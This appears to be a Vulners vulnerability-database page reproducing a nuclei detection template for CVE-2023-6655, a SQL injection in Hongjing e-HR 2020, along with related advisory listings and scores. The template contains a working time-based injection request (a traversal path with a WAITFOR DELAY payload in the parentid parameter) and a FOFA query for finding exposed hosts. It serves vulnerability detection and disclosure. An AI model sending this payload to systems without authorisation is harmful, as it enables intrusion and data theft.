Lucene search
K

Hongjing e-HR 2020 - SQL Injection

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Hongjing e-HR 2020 exposes remote SQL injection in loadhistroyorgtree via parentid.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-6655
19 Dec 202310:42
circl
CNNVD
Hongjing e-HR SQL Injection Vulnerability
10 Dec 202300:00
cnnvd
CVE
CVE-2023-6655
10 Dec 202315:31
cve
Cvelist
CVE-2023-6655 Hongjing e-HR Login Interface loadhistroyorgtree sql injection
10 Dec 202315:31
cvelist
EUVD
EUVD-2023-58877
3 Oct 202520:07
euvd
NVD
CVE-2023-6655
10 Dec 202316:15
nvd
Prion
Sql injection
10 Dec 202316:15
prion
RedhatCVE
CVE-2023-6655
23 May 202502:07
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2023-6655
7 Jun 202500:00
vulncheck_kev
Vulnrichment
CVE-2023-6655 Hongjing e-HR Login Interface loadhistroyorgtree sql injection
10 Dec 202315:31
vulnrichment
Rows per page
id: CVE-2023-6655

info:
  name: Hongjing e-HR 2020 - SQL Injection
  author: pussycat0x
  severity: high
  description: |
    A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL queries via the parentid parameter, potentially extracting sensitive database information including user credentials.
  remediation: |
    Update Hongjing e-HR to a version newer than 2020 that addresses this SQL injection vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6655
    - https://github.com/Gent5698/vulnerability/blob/main/%E5%AE%8F%E6%99%AF/CVE-2023-6655/README.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2023-6655
    cwe-id: CWE-89
    epss-score: 0.03766
    epss-percentile: 0.88594
    cpe: cpe:2.3:a:hrp2000:e-hr:2020:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: hrp2000
    product: e-hr
    fofa-query: title="人力资源信息管理系统"
  tags: cve,cve2023,hjsoft,management-system,sqli,vkev,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, '/hcm/themes/')"
        condition: and
        internal: true

  - raw:
      - |
        GET /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree?isroot=child&parentid=1%27%3BWAITFOR+DELAY+%270%3A0%3A6%27--&kind=2&catalog_id=11&issuperuser=111&manageprive=111&action=111&target= HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate

    matchers:
      - type: dsl
        dsl:
          - "duration >= 6"
# digest: 4b0a00483046022100c1c3d1d1ed6b9d25a8401f8fe45f1e478004eca9d56242a3b882d6d285bf73fe022100a5a13ef66d6984c411400949e80df09df31c0b0682047b5e3cd8e31ae95d59ed:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.17.3 - 9.8
CVSS 27.5
CVSS 37.3
EPSS0.03766
SSVC
10